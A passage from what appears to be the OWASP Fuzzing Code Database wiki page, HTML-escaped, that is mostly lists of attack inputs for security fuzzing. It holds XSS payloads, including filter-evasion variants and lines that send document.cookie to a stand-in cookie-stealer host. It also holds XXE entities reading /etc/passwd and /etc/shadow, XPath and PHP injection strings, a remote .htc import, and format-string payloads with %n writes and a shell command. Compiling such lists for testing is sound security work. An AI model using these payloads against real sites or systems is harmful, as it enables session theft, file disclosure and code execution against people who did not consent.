&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
